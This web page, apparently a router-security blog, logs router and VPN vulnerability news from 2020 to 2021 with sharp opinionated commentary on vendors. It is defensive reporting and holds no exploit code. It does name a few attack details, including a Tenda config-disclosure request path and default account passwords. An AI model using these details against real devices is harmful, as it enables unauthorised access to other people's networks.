A bug with UPnP lets devices connected to the router hack the router without knowing the password. A LAN side device can get Remote Code Execution as root on a buggy router. Perhaps most importantly, this is the fifth major set of remote code execution bugs that Netgear has needed to patch this year. Other remote takeover bugs were found in March (by NCC Group), June (by Microsoft), September (by Polish security researcher Gynvael Coldwind) and also in September (by GRIMM). One defense, not mentioned in the article, is to limit the LAN side devices that can communicate with the router. This is always a good idea. On some of the buggy routers, the bug an not be exploited. Why not? The fix for an earlier bug broke the UPnP SUBSCRIBE and UNSUBSCRIBE functions. Netgear fixed the latest bug in some of their routers but old ones (EoL or End of Life) were not fixed.
Routers are sitting ducks for hackers
PWN2OWN Austin 2021
by Dustin Childs of Zero Day Initiative November 1,
2021
Three routers were targeted at a recent hacking contest and they all were successfully hacked.
The Cisco RV340 router was successfully attacked three times from the WAN/Internet side and six times from the LAN side. A software cesspool, it is. In the very definition of irony, the web page for the RV340 says "Connect Your Network Safely and Securely" Ha.
SEPTEMBER 2021
SonicWall has holes in its wall
SonicWall warns users to patch critical vulnerability as soon as possible
by Pieter Arntz of MalwareBytes September 24, 2021
SonicWall specializes in securing networks but a critical bug makes them less secure. The bug is in the SMA 100 series of devices, specifically the SMA 100, 200, 210, 400, 410, and 500v. Details:
"... the vulnerability is an improper access control ... [that] allows a remote unauthenticated attacker to bypass path traversal checks and delete an arbitrary file. Which, if the attacker knows what they are doing, can potentially result in a reboot to factory default settings. With the default settings in place the attacker can gain administrator privileges by using the factory default credentials."
Patches are available. The patches also include fixes for two other less critical bugs, a local privilege escalation flaw, and a denial-of-service vulnerability.
Fixes available for buggy Netgear routers
Netgear fixes dangerous code execution bug in multiple routers
by Sergiu Gatlan of Bleeping Computer September 21, 2021
Adam Nichols of GRIMM discovered a bug in the Circle parental control service on these Netgear routers: R6400, R6700, R6900, R7850, R7900, R8000 and RS400. If you have a Netgear router, beware of their marketing. Paul Wagenseil warns "Because Netgear markets its home routers using somewhat misleading terminology - for example, the R7000 is also labeled as the 'Nighthawk AC1900 Smart WiFi Dual Band Gigabit Router' - you might want to flip your router over and check the sticker on the bottom for the real model name." If the Circle software is installed, the router is vulnerable. The bug is in the Circle update routine which runs as root. Wagenseil offers perspective on this: "The problem is in the Disney-designed Circle parental-control feature, which was rolled out to Netgear Nighthawk and Orbi mesh routers in 2017. The Orbis and newer Wi-Fi 6 Nighthawks got parental-control software built in-house by Netgear earlier this year, while the Circle service was discontinued for older Nighthawk models in late 2020." Updated firmware is available, but there are many steps to the manual update process. The bug is relatively hard to exploit as the bad guy must be must be able to intercept and modify the router's network traffic. Gatlan points out that earlier this month, Netgear fixed three severe security vulnerabilities impacting over a dozen of their smart switches, allowing bad guys to take over unpatched devices.
For two years, Virgin Media fails to fix a router bug
VPN users unmasked by zero-day vulnerability in Virgin Media routers
by Adam Bannister of Port Swigger September 20, 2021
Fidus Information Security, a UK penetration testing consultancy discovered a flaw in the Virgin Media Super Hub 3 router and reported it in October 2019. In February 2020 Fidus was asked not to publicly reveal the flaw until the first quarter of 2021. They agreed. Suckers. Virgin Media, and parent company Liberty Global, both stopped responding to Fidus. As of the end of September 2021, the bug is still not fixed. The flaw is that the router will reveal the public IP address to anyone on the LAN side that knows how to ask for it. To exploit this, Fidus uses DNS rebinding along with a malicious DNS server for a malicious domain. Load a web page from that domain, and it can reveal the public IP address even when a VPN is being used. Not all VPNs, but many. Some do not allow access to LAN side devices, some do. A good VPN will offer a choice as there is no one right answer. The tested router is really the ARRIS TG2492 and Fidus believes the vulnerability probably works against all related models. Don't hold your breath for a comment from Arris.
One TP-Link router is buggy as heck. What about others?
"Amazon’s Choice" best-selling TP-Link router ships with vulnerable firmware
by Edvardas Mikalauskas of CyberNews.com September 2, 2021
The bugs in this one router model are not important. What is important is that, no doubt, many other TP-Link routers share these bugs and only this one model will be fixed. TP-Link is hugely popular, the article reports they sell over 150 million devices annually. The article is about the TP-Link AC1200 Archer C50 (v6) router. On Amazon it is rated 4.5 stars (out of 5) with over 61,000 ratings. Just shows how security is not a concern. The article covers many bases. For one: "The router is shipped with outdated firmware that is vulnerable to dozens of known security flaws". Then too: "The default version of the router's web interface app suffers from multiple bad security practices and vulnerabilities, including clickjacking, charset mismatch, cookie slack, private IP disclosures, weak HTTPS encryption, and more." They list 13 different issues with the web interface which is surely shared by many TP-Link routers. There were other security problems too. As for known bugs in the shipping firmware, some of these are fixed in later versions of the firmware, however the router does not auto-update.
The researchers said that TP-Link responded quickly and plans on force-feeding the router a firmware update. As for the rest of the many TP-Link routers, this was not discussed. Par for the course.
AUGUST 2021
How low can Cisco go? Pretty low.
Cisco says it will not release software update for critical 0-day in EOL VPN routers
by Jonathan Greig of ZDNet August 27, 2021
Cisco to their customers: Yeah, it's a bug, but we are not going to bother fixing it because the routers are old. Go buy a new router.
Yet again, Cisco has been caught failing to validate input. Lazy, lazy, lazy. Again, again, again. This vulnerability is in the Universal Plug-and-Play (UPnP) service in their Small Business RV110W, RV130, RV130W, and RV215W routers. An unauthenticated attacker can execute arbitrary code or cause a vulnerable device to restart unexpectedly. The support page for the RV215W router says that the end of support date is November 30, 2024. Seems like they lied. And the links for EOL of the RV215W go here which says nothing at all about the RV215W. Cisco is really bad news.
More bugs that will never be fixed
Remote code execution flaws lurk in countless routers, IoT gear, cameras using Realtek Wi-Fi module SDKs
by Thomas Claburn of The Register August 16, 2021
There are vulnerabilities in three Realtek SDKs accompanying its Wi-Fi modules. This article says there are 4 bugs, the original report lists a dozen. The hardware is used in almost 200 products made by more than 65 vendors. Vendors selling the buggy hardware include: AsusTEK, Amped Wireless, Belkin, Buffalo, D-Link (many devices), Edimax, EnGenius, Huawei, Logitech, Netis, Technicolor, Tenda, TRENDnet, Zyxel and Netgear. The flaws require an attacker to be on the same network as the vulnerable device, or be able to reach it over the Internet. It is not clear if a VLAN offers any protection. Remote unauthenticated attackers (the worst kind) can fully compromise a device and execute code with the highest level of privilege.
One buggy device, the Realtek RTL819xD module, creates wireless access points. One estimate is that almost a million vulnerable devices may use the buggy software, including VoIP and wireless routers, repeaters, IP cameras, and smart lighting controls. Realtek will fix some of the bugs, others are in software that is too old to bother with. However, it is expected that most vulnerable devices will never be patched.
Fortinet falls down
Fortinet delays patching zero-day allowing remote server takeover
by Sergiu Gatlan of Bleeping Computer August 17, 2021
This is interesting, to me, not because of the delay in patching that is the focus of the article. Instead, I take note the long list of security bugs in Fortinet software that is cited at the end of the article. It's pretty long. And, the fact that Fortinet clammed up and stopped responding to Rapid7 which found the latest bug. That is not acceptable.
Cisco bugs never cease. They are as inevitable as death and taxes
Cisco fixes critical, high severity pre-auth flaws in VPN routers
by Sergiu Gatlan of Bleeping Computer August 4, 2021
The web-based interface of these Cisco routers are buggy: RV340, RV340W, RV345, RV345P (Dual WAN Gigabit VPN routers), RV160, RV160W, RV260, RV260P, and RV260W (VPN routers). Yet again, the underlying problem is improperly validated HTTP requests and insufficient user input validation. Yet again. If remote access is disabled, then buggy devices are safe on the WAN side. There is no protection at all on the LAN side (the web interface can not be disabled), so the existing patches should be installed ASAP.
There are two bugs. Attackers without the password can trigger a denial of service condition or execute commands and arbitrary code.
Yet another widespread router flaw
Decade-long vulnerability in multiple routers could allow network compromise
by Jessica Haworth of Port Swigger August 4, 2021
Evan Grant of Tenable discovered an authentication bypass vulnerability in many routers and modem/routers manufactured by Arcadyan. The bug exists in at least 20 router models from 17 different vendors including Asus, Verizon, Vodafone, British Telecom, O2 (Telefonica), Orange, Hughesnet, Deutsche Telekom, Telstra and Telus. Was your router made by Arcadyan? None of the articles mentioned how you can tell. I have recent photos of a Verizon FIOS G3100 router and it certainly does not say Arcadyan anywhere on the outside. The important lesson here for consumer routers is that the vendor selling you the device is not necessarily the one who manufactured it. Grant also found two separate flaws in some Buffalo routers. This was the first time Grant had looked at a router for bugs and he said the flaws were "fairly easy to discover" and "trivial to exploit" The widespread bug is a path traversal flaw and is assigned CVE-2021–20090. The bug has been around for at least 12 years and can be exploited by unauthenticated, remote attackers. What is not said is whether the flaw can be exploited on routers that have Remote Administration turned off. My guess is no and that this fact was left out to make the bug seem more important. That said, I recently used a Verizon FIOS G3100 router and the user interface for Remote Administration was so miserably confusing I could not tell if I was turning it on or off.
UPDATE: Aug 25, 2021. I am told by a Verizon FIOS customer that there is new firmware, version 3.1.0.12, for the G3100 Router. The router self-updates. According to Joshua Lowcock it only self-updates, but he documented a work-around to force an update.
What changes are in this new release? None of your business, Verizon does not seem to keep a change log. However, the GUI for the Admin interface has changed dramatically, which can only be a good thing. Lowcock notes that the new firmware has a dedicated wireless network for IoT,
offers control over each wifi antenna and has a new performance-mode tri-band setting. Nothing about a security bug fix. Way back when, Verizon kept using WEP a decade after it was known to be insecure, so I would not get my hopes up about bug fixes.
JULY 2021
Bugs in a D-Link router. Just one model? None of your business
D-Link issues hotfix for hard-coded password router vulnerabilities.
by Sergiu Gatlan of Bleeping Computer July 16, 2021
If hard code password backdoors do not turn you off D-Link, nothing will. A guy at Cisco, Dave McDaniel, took a look at the DIR-3040 router and found it to be a security nightmare. Multiple vulnerabilities: command injection, information disclosure and the biggie - executing arbitrary code. I am not surprised. I am also not surprised that the original report from Cisco and the article about it from Bleeping Computer focus exclusively on the DIR-3040. So too does D-Link. This is disgraceful. What about other similar routers with similar firmware? Clearly, that is none of our business. What should someone with a DIR-2640 or DIR-1950 do? Router vendors share firmware across multiple models. It is all but guaranteed that similar models have the same bugs. Anyone using a D-Link router clearly does not care about security. Still, Cisco says the bugs were fixed on July 13th but D-Link says on June 9th. Beats me.
A bad Summer for SonicWall
Another Brick in the Wall: eCrime Groups Leverage SonicWall VPN Vulnerability
by Heather Smith and Hanno Heinrichs of Crowdstrike June 8, 2021
There was a bug, SonicWall did not fix it completely and eventually bad guys exploited the heck out of it. Quoting Pieter Arntz: "In the continuous wave of ransomware attacks you may have noticed a trend where the software and devices that are designed to keep you safe, are being used to establish the opposite. This year we have seen Pulse Secure vulnerabilities exploited in the wild, CISA warnings about successful attacks targeting a number of years-old vulnerabilities, and the colossal Kaseya supply-chain attack, among others."
JUNE 2021
Multiple Zyxel devices vulnerable to WAN side attack
Sophisticated hackers are targeting these Zyxel firewalls and VPNs
by Liam Tung of ZDNet June 25, 2021
Bad guys are hacking into these Zyxel devices: Unified Security Gateway (USG), ZyWALL, the USG FLEX combined firewall and VPN gateway, Advanced Threat Protection firewalls, and VPN series devices. They are modifying the devices to gain entry into the network behind them. The official Zyxel response makes it sound as if the bad guys are abusing back door accounts built into the devices. If so, it would not be the first time. Earlier this year, researchers found a backdoor account in Zyxel firmware, which left 100,000 devices vulnerable.
Microsoft toots their own horn - finds bug in 10 year old Netgear consumer router
Microsoft finds new NETGEAR firmware vulnerabilities that could lead to identity theft and full system compromise
by Jonathan Bar Or
of Microsoft 365 Defender Research Team June 30, 2021
The buggy router, the NETGEAR DGN-2200 v1 series is really a combination modem/router. And, it is old as heck, the User Guide is dated February 2011. Yet, here we are, in June 2021 and Microsoft announces that they found bugs in it. This is really a PR stunt for Microsoft defensive software. That said, their software was triggered by "... a device owned by a non-IT personnel was trying to access a NETGEAR DGN-2200v1 router’s management port." Great catch, but who is using a 10 year old DSL modem/router and the latest and greatest Microsoft software? The router is as buggy as buggy gets. Any remote person can get full control of it. The worst bug lets you access any page in the web admin if you include one of the get-out-of-jail-free character strings in the GET request. Another bug exploits the encryption of the configuration backup file to learn the userid/password to login legitimately. The bugs are described in enough details to make someone not trust Netgear. The bugs have been fixed, which is quite a trick. You have to assume this router was End-of-Life years ago.
MAY 2021
Wi-Fi bugs in most every Wi-Fi device
Frag Attack
by Mathy Vanhoef of NYU May 10, 2021
Shame on everyone for these Frag Attack bugs. Some of the Wi-Fi bugs are in the official specs for how Wi-Fi is supposed to work. For that, shame on the Wi-Fi Alliance, a group that has previously shown itself not to be up to the job. The rest of the bugs fall on many assorted programmers for not programming to the specs. Not just the programmers working for one company, but for many companies.
Why so much shame? It is very likely that every Wi-Fi device in the world has at least one of the 12 bugs. Quoting Vanhoef: "In experiments on more than 75 devices, all of them were vulnerable to one or more of the discovered attacks." Bug fixes are need from dozens, if not hundreds, of sources. We'll get some, over time, but these bugs are sure to last for decades. The design flaws are difficult to exploit according to Vanhoef: "... the biggest concern are the programming mistakes in Wi-Fi products since several of them are trivial to exploit." One defense is HTTPS. A VPN helps with some of the bugs, but not all. Quoting: "Using a VPN can prevent attacks where an adversary is trying to exfiltrate data. It will not prevent an adversary from bypassing your router's NAT/firewall to directly attack devices." Interestingly, Wi-Fi 6 (aka ax) is more vulnerable than Wi-Fi 5 (aka ac). Vanhoef has worked with the Wi-Fi Alliance for the last nine months to get these bugs fixed. To date, five companies have released patches. Vanhoef gets in a dig at the Wi-Fi Alliance when he says "...it's essential to regularly test Wi-Fi products for security vulnerabilities, which can for instance be done when certifying them." The Wi-Fi Alliance does this certification. We may be in good hands with Allstate, but that is not the case with the Wi-Fi Alliance. He also says the biggest risk is likely the ability to abuse these flaws to attack devices in someone's home network. He does not offer a defense, but I will - VLANs, or, at the least, Guest Wi-Fi networks. Or, a second router. The bug that scares me the most is the one that allows bad guys to bypass a router firewall and attack devices directly. He tested four consumer routers and found two were vulnerable, but he did not name names and did not say which of the 12 bugs they were vulnerable to. Check with your router vendor to see if they have anything to say about this. Likewise, fixes are needed for Access Points and operating systems.
How bad is this really? From the horse's mouth:
Does this mean every Wi-Fi device is trivial to attack?
"The design issues are, on their own, tedious to exploit in practice. Unfortunately, some of the implementation vulnerabilities are common and trivial to exploit. Additionally, by combining the design issues with certain implementation issues, the resulting attacks become more serious. This means the impact of our findings depends on the specific target. Your vendor can inform you what the precise impact is for specific devices. In other words, for some devices the impact is minor, while for others it's disastrous."
Still more bugs in Cisco RV34X routers
Advisory: Cisco RV34X Series – Privilege Escalation in vpnTimer
by T. Shiomitsu of the IoT Inspector Research Lab May 5, 2021
"A few weeks ago, we published an advisory on the Cisco RV series routers, where we outlined the root cause for authentication bypass and remote command execution issues.
This week, Cisco has released an advisory for another bug we reported around the same time: A privilege escalation issue, which could be used in combination with the other two issues to run arbitrary code with root privileges on affected RV34X devices. ". The bug is CVE-2021-1520 - Privilege Escalation in vpnTimer. A look at old firmware shows that the bug has been present since at least the first firmware update package of the RV34X series back in February 2017). Vulnerable routers are the RV340, RV340W, RV345 and the RV345P. A fix is available.
APRIL 2021
Bugs in Cisco RV34X series routers
Advisory: Cisco RV34X Series – Authentication Bypass and Remote Command Execution
by T. Shiomitsu of the IoT Inspector Research Lab April 13, 2021
"In early 2021, we reported a few security issues to Cisco related to their RV34X series of routers, two of which have been recently patched. The issues in question were an authentication bypass and system command injection, both in the web management interface. These can be chained together to achieve unauthenticated command execution." Cisco took 4 months to release a fix (Jan 2, 2021 through April 7, 2021) and they admit that other devices are also affected. The bugs are CVE-2021-1472 - RV34X /upload Authorization Bypass Vulnerability and CVE-2021-1473 - RV34X OS Command injection in Cookie string.
Critical bug in Juniper Junos OS - fixes available
Critical Vulnerability Can Allow Attackers to Hijack or Disrupt Juniper Devices
by Eduard Kovacs of Security Week April 16, 2021
A buffer size validation flaw may allow an unauthenticated remote attacker to send specially crafted packets to a vulnerable device, triggering a partial Denial of Service, or remote code execution. An attacker who successfully exploits the vulnerability can gain root access to the targeted system. The bug is in the overlayd daemon which runs as root by default and listens for UDP connections on port 4789. The underlying problem is improper buffer size validation, which can lead to a buffer overflow. The bug is CVE-2021-0254. Good news: Fixes are available and vulnerable devices are typically not exposed to the Internet. The bug was discovered by Nguyễn Hoàng Thạch with Singapore-based cybersecurity company STAR Labs.
MARCH 2021
Bug in D-Link DIR-3060 router
Advisory: D-Link DIR-3060 Authenticated RCE (CVE-2021-28144)
by IoT Inspector Research Lab March 11, 2021
The D-Link DIR-3060 is affected by a post-authentication command injection vulnerability. Anybody with authenticated access to the router can run arbitrary system commands on the device as the system admin user, with root privileges. D-Link has released a patched firmware.
Bugs in Cisco RV132W and RV134W routers
CVE-2021-1287 Detail
by NIST March 17, 2021
"A vulnerability in the web-based management interface of Cisco RV132W ADSL2+ Wireless-N VPN Routers and Cisco RV134W VDSL2 Wireless-AC VPN Routers could allow an authenticated, remote attacker to execute arbitrary code on an affected device or cause the device to restart unexpectedly. The vulnerability exists because the web-based management interface does not properly validate user-supplied input.... A successful exploit could allow the attacker to execute arbitrary code as the root user .... " The attacker needs to be authenticated to the device before they can exploit the flaw. Fixes are available.
FEBRUARY 2021
Still more Cisco bugs
Cisco Warns of Critical Auth-Bypass Security Flaw
by Lindsey O'Donnell of Threatpost
February 25, 2021
"A critical vulnerability in Cisco Systems' intersite policy manager software could allow a remote attacker to bypass authentication. The vulnerability is one of three critical flaws fixed by Cisco on this week. It exists in Cisco’s ACI Multi-Site Orchestrator (ACI MSO) — this is Cisco’s management software for businesses ... The flaw stems from improper token validation on an API endpoint in Cisco’s ACI MSO. The vulnerability ranks 10 (out of 10) on the CVSS vulnerability-rating scale. The glitch is considered critical because an attacker - without any authentication - could remotely could exploit it..." Cisco also fixed a bug in their NX-OS network operating system for Nexus-series Ethernet switches. This flaw, which has a CVSS score of 9.8 out of 10, lets an unauthenticated, remote attacker create, delete or overwrite arbitrary files with root privileges on Cisco Nexus 3000 Series Switches and Cisco Nexus 9000 Series Switches.
Paying more does not get you better software
Fortinet fixes critical vulnerabilities in SSL VPN and web firewall
by Ax Sharma of Bleeping Computer February 7, 2021
There are assorted bugs in the FortiProxy SSL VPN and FortiWeb Web Application Firewall (WAF) products. The worst bug is in the FortiProxy SSL VPN, it can be triggered by a remote, unauthenticated attacker using a specially crafted POST request. A SQL Injection flaw (CVE-2020-29015) lets an attacker get the hash of the administrator account due to excessive DBMS user privileges. A Buffer Overflow flaw (CVE-2020-29016) allows for arbitrary code execution by a remote attacker without the password.
JANUARY 2021
SonicWall hacked using a bug in their own software
SonicWall firewall maker hacked using zero-day in its VPN device
by Lawrence Abrams of Bleeping Computer January 23, 2021
"SonicWall is a well-known manufacturer of hardware firewall devices, VPN gateways, and network security solutions whose products are commonly used in SMB/SME and large enterprise organizations." They released an advisory warning that hackers used a bug in their Secure Mobile Access (SMA) VPN device and their NetExtender VPN client to attack their internal systems.
Until the bug is fixed they suggest enabling two-faction authentication and blocking web traffic from countries that do not need to access their devices. Then:
SonicWall SMA 100 zero-day exploit actively used in the wild
by Lawrence Abrams February 1, 2021
SonicWall is still investigating the vulnerability and has not provided many details. It likely affects their SMA 100 series of remote access appliances. Another suggested mitigation is restricting the IP addresses than can access the SonicWall management interface. Then:
SonicWall fixes actively exploited SMA 100 zero-day vulnerability
By Lawrence Abrams February 3, 2021
They released a patch for the bug in the SMA 100 series of appliances running firmware version 10.x. Specifically: the SMA 200, SMA 210, SMA 400, SMA 410 and the virtual SMA 500v appliance. They have still not provided any details on the vulnerability. Tweets from the NCC Group indicate that it allows remote access to the management interface without authorization.
And ... still MORE Cisco bugs
Cisco reveals critical bug in small biz VPN routers when half the
world is stuck working at home
by Simon Sharwood of The Register February 5, 2021
This is as bad as bad gets. The worst bugs "can be exploited by an unauthenticated, remote attacker to execute arbitrary code as the root user. All the attacker needs to do is send a maliciously crafted HTTP request to the web-based management interface." Routers vulnerable to this are: RV160, RV160W, RV260, RV260P, and RV260W. Other bugs allow a remote bad guy, again without a password, to "conduct directory traversal attacks and overwrite certain files that should be restricted ...." Other Cisco routers, the RV016, RV042, RV042G, RV082, RV320, and RV325 have still other bugs. All the bugs seem to be due to lazy Cisco employees who can't be bothered to validate input. Four buggy routers, the RV016, RV042, RV042G, and RV082 are not getting updates because they are too old. If the bugs don't turn you away from Cisco, consider the tech support experience - they put most of the burden on you. These quotes are from the bug Advisories below.
You want the patches? "... customers may only download software for which they have a valid license, procured from Cisco directly, or through a Cisco authorized reseller or partner."
You want to learn about available updates? Cisco won't tell you. "When considering software upgrades, customers are advised to regularly consult the advisories for Cisco products, which are available from the Cisco Security Advisories page, to determine exposure..." Will the available update work on your hardware? You figure it out. "In all cases, customers should ensure that the devices to be upgraded contain sufficient memory and confirm that current hardware and software configurations will continue to be supported properly by the new release." I don't even know what the last part of that quote means. The big point is that you pump your own gas when you are a Cisco customer. I would not use their hardware for a paper weight.
More Cisco bugs
High-Severity Cisco Flaw Found in CMX Software For Retailers
by Lindsey O'Donnell of ThreatPost January 13, 2021
At this point, I would not trust or even want to touch any hardware or software from Cisco. Their software has too many bugs and this case shows their refusal to fix some bugs. Cisco addressed 67 high-severity bugs. That is far too many to have in software that is reasonably mature. Far too many. Sixty of the bugs exist in in the web-based management interface of Cisco Small Business RV110W, RV130, RV130W and RV215W routers. Quoting: "Of note, Cisco said it would not release software updates for the Cisco Small Business RV110W, RV130, RV130W and RV215W routers, as they have reached end of life."
DECEMBER 2020
Bugs bugs bugs bugs bugs bugs
Vulnerability Summary for the Week of December 28, 2020 Bulletin (SB21-004)
by the CISA branch of the US Government January 4, 2021
A summary of new vulnerabilities that have been recorded in the past week. Again, just one week. Below is a summary of the CISA summary for assorted devices from networking companies. They may not all be routers and the severity of the bugs vary widely.
---------
Tenda AC1200 (Model AC6) the default settings for the router speed test contain links to download malware CVE-2020-28094
Tenda AC1200 (Model AC6) a large HTTP POST request sent to the change password API will trigger the router to crash and enter an infinite boot loop. CVE-2020-28095
Tenda N300 F3 devices allow remote attackers to obtain sensitive information via a direct request for cgi-bin/DownloadCfg/RouterCfm.cfg CVE-2020-35391
Tenda AC1200 (Model AC6) userids: admin, support, user, and nobody have a password of 1234. CVE-2020-28093
---------
Belkin LINKSYS RE6500 allow remote attackers to execute arbitrary commands or set a new password via shell metacharacters CVE-2020-35713
Belkin LINKSYS RE6500 allow remote attackers to cause a persistent denial of service (segmentation fault) CVE-2020-35716
Belkin LINKSYS RE6500 allow remote authenticated users to execute arbitrary commands via shell metacharacters in a filename CVE-2020-35715 and CVE-2020-35714
---------
TP-Link: a password-disclosure issue in the web interface of certain TP-Link devices allows a remote attacker to get full administrative access to the web panel. CVE-2020-35575
---------
Certain Zyxel products allow command injection by an admin via an input string to chg_exp_pwd during a password-change action. CVE-2020-29299
------------
DrayTek Vigor2960 allows remote command execution via shell metacharacters in a toLogin2FA action to mainfunction.cgi. CVE-2020-19664
-------------
Certain NETGEAR devices are affected by disclosure of sensitive information. CVE-2020-35802
Certain NETGEAR devices are affected by a buffer overflow by an authenticated user. CVE-2020-35787
Certain NETGEAR devices are affected by command injection by an authenticated user. CVE-2020-35793
NETGEAR DGN2200v1 devices mishandle HTTPd authentication CVE-2020-35785
NETGEAR GS716Tv3 and GS724Tv4 are affected by CSRF. CVE-2020-35778
NETGEAR JGS516PE , JGS524PE, JGS524Ev2 and GS116Ev2 are affected by lack of access control at the function level. CVE-2020-35784
NETGEAR JGS516PE, JGS524Ev2, JGS524PE and GS116Ev2 are affected by incorrect configuration of security settings. CVE-2020-35801
NETGEAR NMS300 devices are affected by command injection by an authenticated user. CVE-2020-35789
NETGEAR NMS300 devices are affected by denial of service. CVE-2020-35780 and CVE-2020-35781
NETGEAR R7500v2, R8900, R9000 and R7800 are affected by command injection by an authenticated user. CVE-2020-35792 and CVE-2020-35791
NETGEAR RBS40V, RBK752, RBR750, RBS750, RBK852, RBR850 and RBS850 are affected by command injection by an authenticated user. CVE-2020-35794
NETGEAR WAC104 devices are affected by a buffer overflow by an authenticated user. CVE-2020-35788
NETGEAR D6200, D7000, JNR1010v2, JR6150, JWNR2010v5, R6020, R6050, R6080, R6120, R6220, R6260, WNR1000v4, WNR2020 and WNR2050 are affected by stored XSS.
CVE-2020-35840 and CVE-2020-35842
NETGEAR R7800 is affected by a buffer overflow by an authenticated user. CVE-2020-35786
NETGEAR D7800, R7500v2, R7800, R8900, R9000, RAX120, RBK50, RBR50, RBS50, XR500 and XR700 are affected by stored XSS. CVE-2020-35824 and CVE-2020-35830 and CVE-2020-35835
NETGEAR D7800, R7800, R8900, R9000 and XR700 are affected by disclosure of sensitive information. CVE-2020-35804 and CVE-2020-35838 and CVE-2020-35837
NETGEAR R6400v2, R6700v3, R6900P, R7000, R7000P, R7800, R7850, R7900, R7960P, R8000, R7900P, R8000P, RAX15, RAX20, RAX200, RAX45, RAX50, RAX75, RAX80, RBK752, RBR750, RBS750, RBK852, RBR850, RBS850, RBK842, RBR840, RBS840, RS400 and XR300 are affected by command injection by an unauthenticated attacker. CVE-2020-35798
---------
Just ... one ... week.
Critical bug in D-Link DSR VPN routers
D-Link VPN routers get patch for remote command injection bugs
by Ionut Ilascu of Bleeping Computer December 8, 2020
No one makes money saying that newly discovered bugs are not that big a deal. So, this trio of D-Link bugs may or may not be a big deal, despite the fact that everyone says the sky is falling. To be clear, the most critical of the three bugs is indeed the worst possible type of flaw - anyone on the Internet can totally hack these routers. What is not said, however, is whether the web interface to these routers is exposed to the Internet by default. If not, this is much less of an issue. I suspect the web interface is not available remotely because if it was, the company that found these bugs would say so. Either way, D-Link should say something about this in their response, but, they do not. They don't care about security. Further proof about how little D-Link cares about security is the timeline. Three bugs were reported to them on August 11, 2020. Their first response was early December 2020. They fixed two of the bugs and consider the third not a real problem. The most critical bug can also be exploited on the LAN but VLANs can be used to limit access to the web based Admin interface. At least on good routers they can. I don't know if these routers support VLANs. The bugs affect the DSR-150, DSR-250, DSR-500 and DSR-1000.
NOVEMBER 2020
Avoid routers from Jetstream and Wavlink
Walmart-exclusive router and others sold on Amazon and eBay contain hidden backdoors to control devices
by Bernard Meyer of CyberNews.com November 23, 2020
This expands on a problem first noticed in April 2020. Quoting: "In a collaboration between CyberNews Sr. Information Security Researcher Mantas Sasnauskas and researchers James Clee and Roni Carta, suspicious backdoors have been discovered in a Chinese-made Jetstream router, sold exclusively at Walmart as their new line of 'affordable' wifi routers. This backdoor would allow an attacker the ability to remotely control not only the routers, but also any devices connected to that network ... the cybersecurity research team also discovered that low-cost Wavlink routers, normally sold on Amazon or eBay, have similar backdoors. The Wavlink routers also contain a script that lists nearby wifi and has the capability to connect to those networks ... While Jetstream has an exclusive deal with Walmart, and is sold under other brand names like Ematic, there is very little information available about which Chinese company actually produces these products ... While Clee's original research (and follow-up) analyzed one Wavlink router, our new analysis shows that multiple Wavlink and Jetstream devices have now been shown to be affected. In fact, all of the devices that the team analyzed were found to contain backdoors.
Routers from Asus and TP-Link hacked at a hacking contest
Routers, NAS Devices, TVs Hacked at Pwn2Own Tokyo 2020
by Eduard Kovacs of Security Week November 9, 2020
Update: Dec 17, 2020: I am tracking the acknowledgment and/or fix for the Asus router on the News page. So far, nothing.
Update Nov 13, 2020: It appears that one of these articles was wrong. The Netgear router was not hacked. Also, the TP-Link router is not sold in the US.
The three routers that have been reportedly been hacked at the contest are the ASUS RT-AX86U, the TP-Link TL-WDR7660 and the NETGEAR Nighthawk R7800. Two bugs were found in the Netgear router. The bugs will be disclosed to the hardware manufacturers and hopefully fixes will be released. What no one will say is whether the same bugs exist in other routers from these companies.
OCTOBER 2020
The second critical flaw for SonicWall this year
800,000 SonicWall VPNs vulnerable to new remote code execution bug
by Catalin Cimpanu of ZDNet October 15, 2020
SonicWall Network Security Appliances are used as firewalls and SSL VPN portals to control access internal and private networks. The Tripwire VERT security team discovered a bug that exists in almost 800,000 internet-accessible SonicWall VPN appliances. The bug is considered critical and is expected to come under active exploitation once proof-of-concept code is made publicly available. The underlying problem is a stack-based buffer overflow. To exploit the bug, bad guys do not need to have valid credentials. Oh, and the bug is trivial to exploit, even for unskilled attackers. This is SonicWall's second major bug this year. Patches are available.
JULY 2020
Asus router bug and insight into Asus itself
ASUS Router Vulnerable to Fake Updates and XSS
by Martin Rakhmanov of Trustwave July 23, 2020
Rakhmanov found two bugs in the ASUS RT-AC1900P router and the company has fixed them. One bug (CVE-2020-15498) was that the firmware update process accepted software with forget server certificates. This would have let spies and hackers install their own firmware on their router. An attacker would have to be adjacent network-wise to the router to perform this man in the middle attack, but it could result in a full compromise of the router. The other bug (CVE-2020-15499) was an XSS in a dialog window of the admin interface. There are two things here that are very important, much moreso than the bugs themselves. Neither ASUS nor Rakhmanov said anything about other ASUS routers. It is very likely they too are vulnerable, but it is none of our business. Then too, there is the way Asus handled this. For one thing they never issued a security advisory. And, as we see below in the Revision History, they could not be bothered to tell Rakhmanov when they fixed the bug. And, when he asked they were not sure if they fixed one or both bugs.
Multiple D-Link router bugs
5 severe D-Link router vulnerabilities disclosed, patch now
By Ax Sharma of Bleeping computer July 24, 2020
It is not clear from this story which routers are buggy. The research the story is based on is for a router that is End-of-Life (no more bug fixes, it's too darn old to bother with).
The bugs are in the web interface to the router, as they often are. Best practices for router security is always to limit LAN side access to the router's admin interface, and, of course, to disable remote administration. I found one bug quite noteworthy. It lets a bad guy bypass the router password by adding a couple parameters to the HTTP request to the router. The same flaw was reported in 2010 and again in 2011. That tells you all you need to know about D-Link.
Way too many bugs in Cisco software
Cisco releases security fixes for critical VPN, router vulnerabilities
by Charlie Osborne for ZDNet July 17, 2020
For the most part, I leave out Cisco bugs from this page because there are just too many of them. The number of critical bugs in Cisco software over the years has been far too high. I would not use their products. Cisco just released fixes for 34 bugs, five of which are the most critical in that they allow bad guys to get total control of vulnerable devices. One issue is the Telnet service in the Small Business RV110W Wireless-N VPN Firewall router. It has a default, static password that, if obtained by attackers, can lead to the full remote hijacking of a device. This is a mistake that can not be forgiven and not the first time Cisco has had hard coded passwords. A flaw in the management interface of the Cisco Small Business RV110W, RV130, RV130W, and RV215W routers can be exploited to execute arbitrary code as the root user. This is a very common flaw, improper validation of input. Translation: lazy programmers. Same thing with the web interface of the Cisco RV110W VPN Firewall and RV215W VPN router.
Do not buy a router from Tenda
Tenda AC15 AC1900 Vulnerabilities Discovered and Exploited
by Sanjana Sarda of Independent Security Evaluators July 10, 2020
